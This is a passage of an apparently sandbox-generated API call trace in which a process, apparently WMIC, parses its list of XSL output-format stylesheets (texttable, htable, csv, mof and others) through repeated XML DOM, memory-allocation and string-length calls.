text=0x16f980*="texttable.xsl") returned 0x0 [0211.211] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.211] malloc (_Size=0x18) returned 0x526d50 [0211.211] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.211] free (_Block=0x526d50) [0211.211] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0211.211] malloc (_Size=0x18) returned 0x526d50 [0211.211] malloc (_Size=0x18) returned 0x526d70 [0211.211] malloc (_Size=0x30) returned 0x528080 [0211.211] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.211] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.211] IUnknown:Release (This=0x219a280) returned 0x0 [0211.211] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=1, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.211] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="textvaluelist.xsl") returned 0x0 [0211.212] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.212] malloc (_Size=0x18) returned 0x526e90 [0211.212] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.212] free (_Block=0x526e90) [0211.212] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0211.212] malloc (_Size=0x18) returned 0x52c270 [0211.212] malloc (_Size=0x18) returned 0x52c290 [0211.212] SysStringLen (param_1="VALUE") returned 0x5 [0211.212] SysStringLen (param_1="TABLE") returned 0x5 [0211.212] SysStringLen (param_1="TABLE") returned 0x5 [0211.212] SysStringLen (param_1="VALUE") returned 0x5 [0211.212] malloc (_Size=0x30) returned 0x5280c0 [0211.212] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.212] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.212] IUnknown:Release (This=0x219a280) returned 0x0 [0211.212] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=2, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.212] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="textvaluelist.xsl") returned 0x0 [0211.212] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.212] malloc (_Size=0x18) returned 0x52c2b0 [0211.212] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.212] free (_Block=0x52c2b0) [0211.212] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0211.213] malloc (_Size=0x18) returned 0x52c2b0 [0211.213] malloc (_Size=0x18) returned 0x52c2d0 [0211.213] SysStringLen (param_1="LIST") returned 0x4 [0211.213] SysStringLen (param_1="TABLE") returned 0x5 [0211.213] malloc (_Size=0x30) returned 0x528100 [0211.213] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.213] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.213] IUnknown:Release (This=0x219a280) returned 0x0 [0211.213] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=3, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.213] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="rawxml.xsl") returned 0x0 [0211.213] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.213] malloc (_Size=0x18) returned 0x52c2f0 [0211.213] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.213] free (_Block=0x52c2f0) [0211.213] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0211.213] malloc (_Size=0x18) returned 0x52c2f0 [0211.213] malloc (_Size=0x18) returned 0x52c310 [0211.213] SysStringLen (param_1="RAWXML") returned 0x6 [0211.213] SysStringLen (param_1="TABLE") returned 0x5 [0211.213] SysStringLen (param_1="RAWXML") returned 0x6 [0211.214] SysStringLen (param_1="LIST") returned 0x4 [0211.214] SysStringLen (param_1="LIST") returned 0x4 [0211.214] SysStringLen (param_1="RAWXML") returned 0x6 [0211.214] malloc (_Size=0x30) returned 0x528140 [0211.214] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.214] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.214] IUnknown:Release (This=0x219a280) returned 0x0 [0211.214] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=4, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.214] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="htable.xsl") returned 0x0 [0211.214] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.214] malloc (_Size=0x18) returned 0x52c330 [0211.214] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.214] free (_Block=0x52c330) [0211.214] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0211.214] malloc (_Size=0x18) returned 0x52c330 [0211.214] malloc (_Size=0x18) returned 0x52c350 [0211.214] SysStringLen (param_1="HTABLE") returned 0x6 [0211.214] SysStringLen (param_1="TABLE") returned 0x5 [0211.214] SysStringLen (param_1="HTABLE") returned 0x6 [0211.214] SysStringLen (param_1="LIST") returned 0x4 [0211.214] malloc (_Size=0x30) returned 0x528180 [0211.214] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.214] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.214] IUnknown:Release (This=0x219a280) returned 0x0 [0211.214] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=5, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.215] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="hform.xsl") returned 0x0 [0211.215] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.215] malloc (_Size=0x18) returned 0x52c370 [0211.215] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.215] free (_Block=0x52c370) [0211.215] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0211.215] malloc (_Size=0x18) returned 0x52c370 [0211.215] malloc (_Size=0x18) returned 0x52c390 [0211.215] SysStringLen (param_1="HFORM") returned 0x5 [0211.215] SysStringLen (param_1="TABLE") returned 0x5 [0211.215] SysStringLen (param_1="HFORM") returned 0x5 [0211.215] SysStringLen (param_1="LIST") returned 0x4 [0211.215] SysStringLen (param_1="HFORM") returned 0x5 [0211.215] SysStringLen (param_1="HTABLE") returned 0x6 [0211.215] malloc (_Size=0x30) returned 0x5281c0 [0211.215] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.215] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.215] IUnknown:Release (This=0x219a280) returned 0x0 [0211.215] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=6, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.215] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="xml.xsl") returned 0x0 [0211.215] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.215] malloc (_Size=0x18) returned 0x52c3b0 [0211.215] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.215] free (_Block=0x52c3b0) [0211.215] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0211.216] malloc (_Size=0x18) returned 0x52c3b0 [0211.216] malloc (_Size=0x18) returned 0x52c3d0 [0211.216] SysStringLen (param_1="XML") returned 0x3 [0211.216] SysStringLen (param_1="TABLE") returned 0x5 [0211.216] SysStringLen (param_1="XML") returned 0x3 [0211.216] SysStringLen (param_1="VALUE") returned 0x5 [0211.216] SysStringLen (param_1="VALUE") returned 0x5 [0211.216] SysStringLen (param_1="XML") returned 0x3 [0211.216] malloc (_Size=0x30) returned 0x528200 [0211.216] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.216] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.216] IUnknown:Release (This=0x219a280) returned 0x0 [0211.216] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=7, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.216] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="mof.xsl") returned 0x0 [0211.216] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.216] malloc (_Size=0x18) returned 0x52c3f0 [0211.216] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.216] free (_Block=0x52c3f0) [0211.216] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0211.216] malloc (_Size=0x18) returned 0x52c3f0 [0211.216] malloc (_Size=0x18) returned 0x52c410 [0211.216] SysStringLen (param_1="MOF") returned 0x3 [0211.216] SysStringLen (param_1="TABLE") returned 0x5 [0211.216] SysStringLen (param_1="MOF") returned 0x3 [0211.216] SysStringLen (param_1="LIST") returned 0x4 [0211.216] SysStringLen (param_1="MOF") returned 0x3 [0211.216] SysStringLen (param_1="RAWXML") returned 0x6 [0211.217] SysStringLen (param_1="LIST") returned 0x4 [0211.217] SysStringLen (param_1="MOF") returned 0x3 [0211.217] malloc (_Size=0x30) returned 0x528240 [0211.217] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.217] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.217] IUnknown:Release (This=0x219a280) returned 0x0 [0211.217] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=8, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.217] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="csv.xsl") returned 0x0 [0211.217] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.217] malloc (_Size=0x18) returned 0x52c430 [0211.217] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.217] free (_Block=0x52c430) [0211.217] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0211.217] malloc (_Size=0x18) returned 0x52c430 [0211.217] malloc (_Size=0x18) returned 0x52c450 [0211.217] SysStringLen (param_1="CSV") returned 0x3 [0211.217] SysStringLen (param_1="TABLE") returned 0x5 [0211.217] SysStringLen (param_1="CSV") returned 0x3 [0211.217] SysStringLen (param_1="LIST") returned 0x4 [0211.217] SysStringLen (param_1="CSV") returned 0x3 [0211.217] SysStringLen (param_1="HTABLE") returned 0x6 [0211.217] SysStringLen (param_1="CSV") returned 0x3 [0211.217] SysStringLen (param_1="HFORM") returned 0x5 [0211.217] malloc (_Size=0x30) returned 0x528280 [0211.217] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.217] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.217] IUnknown:Release (This=0x219a280) returned 0x0 [0211.217] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=9, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.217] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="texttable.xsl") returned 0x0 [0211.217] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.218] malloc (_Size=0x18) returned 0x52c470 [0211.218] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.218] free (_Block=0x52c470) [0211.218] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0211.218] malloc (_Size=0x18) returned 0x52c470 [0211.218] malloc (_Size=0x18) returned 0x52c490 [0211.218] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.218] SysStringLen (param_1="TABLE") returned 0x5 [0211.218] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.218] SysStringLen (param_1="VALUE") returned 0x5 [0211.218] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.218] SysStringLen (param_1="XML") returned 0x3 [0211.218] SysStringLen (param_1="XML") returned 0x3 [0211.218] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.218] malloc (_Size=0x30) returned 0x5282c0 [0211.218] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.218] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.218] IUnknown:Release (This=0x219a280) returned 0x0 [0211.218] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=10, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.218] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="texttable.xsl") returned 0x0 [0211.218] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.218] malloc (_Size=0x18) returned 0x52c4b0 [0211.218] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.218] free (_Block=0x52c4b0) [0211.218] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0211.218] malloc (_Size=0x18) returned 0x52c4b0 [0211.219] malloc (_Size=0x18) returned 0x52c4d0 [0211.219] SysStringLen (param_1="texttablewsys") returned 0xd [0211.219] SysStringLen (param_1="TABLE") returned 0x5 [0211.219] SysStringLen (param_1="texttablewsys") returned 0xd [0211.219] SysStringLen (param_1="XML") returned 0x3 [0211.219] SysStringLen (param_1="texttablewsys") returned 0xd [0211.219] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.219] SysStringLen (param_1="XML") returned 0x3 [0211.219] SysStringLen (param_1="texttablewsys") returned 0xd [0211.219] malloc (_Size=0x30) returned 0x528300 [0211.219] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.219] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.219] IUnknown:Release (This=0x219a280) returned 0x0 [0211.219] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=11, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.219] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="texttable.xsl") returned 0x0 [0211.219] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.219] malloc (_Size=0x18) returned 0x52c4f0 [0211.219] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.219] free (_Block=0x52c4f0) [0211.219] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0211.219] malloc (_Size=0x18) returned 0x52c4f0 [0211.219] malloc (_Size=0x18) returned 0x52c510 [0211.219] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.219] SysStringLen (param_1="TABLE") returned 0x5 [0211.219] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.219] SysStringLen (param_1="XML") returned 0x3 [0211.219] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.219] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.219] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.219] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.220] malloc (_Size=0x30) returned 0x528340 [0211.220] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.220] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.220] IUnknown:Release (This=0x219a280) returned 0x0 [0211.220] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=12, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.220] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="texttable.xsl") returned 0x0 [0211.220] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.220] malloc (_Size=0x18) returned 0x52c530 [0211.220] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.220] free (_Block=0x52c530) [0211.220] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0211.220] malloc (_Size=0x18) returned 0x52c530 [0211.220] malloc (_Size=0x18) returned 0x52c550 [0211.220] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0211.220] SysStringLen (param_1="TABLE") returned 0x5 [0211.220] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0211.220] SysStringLen (param_1="XML") returned 0x3 [0211.220] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0211.220] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.220] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0211.220] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.220] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.220] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0211.220] malloc (_Size=0x30) returned 0x528380 [0211.220] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.220] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.220] IUnknown:Release (This=0x219a280) returned 0x0 [0211.220] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=13, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.221] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="texttable.xsl") returned 0x0 [0211.221] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.221] malloc (_Size=0x18) returned 0x52c570 [0211.221] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.221] free (_Block=0x52c570) [0211.221] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0211.221] malloc (_Size=0x18) returned 0x52c570 [0211.221] malloc (_Size=0x18) returned 0x52c590 [0211.221] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.221] SysStringLen (param_1="TABLE") returned 0x5 [0211.221] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.221] SysStringLen (param_1="XML") returned 0x3 [0211.221] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.221] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.221] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.221] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.221] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.221] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.221] malloc (_Size=0x30) returned 0x5283c0 [0211.221] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.221] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.221] IUnknown:Release (This=0x219a280) returned 0x0 [0211.221] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=14, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.221] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="texttable.xsl") returned 0x0 [0211.221] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.221] malloc (_Size=0x18) returned 0x52c5b0 [0211.221] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.222] free (_Block=0x52c5b0) [0211.222] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0211.222] malloc (_Size=0x18) returned 0x52c5b0 [0211.222] malloc (_Size=0x18) returned 0x52c5d0 [0211.222] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0211.222] SysStringLen (param_1="TABLE") returned 0x5 [0211.222] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0211.222] SysStringLen (param_1="XML") returned 0x3 [0211.222] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0211.222] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.222] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0211.222] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.222] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0211.222] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.222] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.222] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0211.222] malloc (_Size=0x30) returned 0x528400 [0211.222] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.222] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.222] IUnknown:Release (This=0x219a280) returned 0x0 [0211.222] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=15, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.222] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="htable.xsl") returned 0x0 [0211.222] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.222] malloc (_Size=0x18) returned 0x52c5f0 [0211.222] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.222] free (_Block=0x52c5f0) [0211.222] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0211.222] malloc (_Size=0x18) returned 0x52c5f0 [0211.223] malloc (_Size=0x18) returned 0x52c610 [0211.223] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0211.223] SysStringLen (param_1="TABLE") returned 0x5 [0211.223] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0211.223] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.223] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0211.223] SysStringLen (param_1="XML") returned 0x3 [0211.223] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0211.223] SysStringLen (param_1="texttablewsys") returned 0xd [0211.223] SysStringLen (param_1="XML") returned 0x3 [0211.223] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0211.223] malloc (_Size=0x30) returned 0x528440 [0211.223] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.223] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.223] IUnknown:Release (This=0x219a280) returned 0x0 [0211.223] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=16, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.250] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="htable.xsl") returned 0x0 [0211.250] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.250] malloc (_Size=0x18) returned 0x52c630 [0211.250] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.250] free (_Block=0x52c630) [0211.250] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0211.251] malloc (_Size=0x18) returned 0x52c630 [0211.251] malloc (_Size=0x18) returned 0x52c650 [0211.251] SysStringLen (param_1="htable-sortby") returned 0xd [0211.251] SysStringLen (param_1="TABLE") returned 0x5 [0211.251] SysStringLen (param_1="htable-sortby") returned 0xd [0211.251] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.251] SysStringLen (param_1="htable-sortby") returned 0xd [0211.251] SysStringLen (param_1="XML") returned 0x3 [0211.251] SysStringLen (param_1="htable-sortby") returned 0xd [0211.251] SysStringLen (param_1="texttablewsys") returned 0xd [0211.251] SysStringLen (param_1="htable-sortby") returned 0xd [0211.251] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0211.251] SysStringLen (param_1="XML") returned 0x3 [0211.251] SysStringLen (param_1="htable-sortby") returned 0xd [0211.251] malloc (_Size=0x30) returned 0x528480 [0211.251] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.251] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.251] IUnknown:Release (This=0x219a280) returned 0x0 [0211.251] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=17, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.251] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="mof.xsl") returned 0x0 [0211.251] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.251] malloc (_Size=0x18) returned 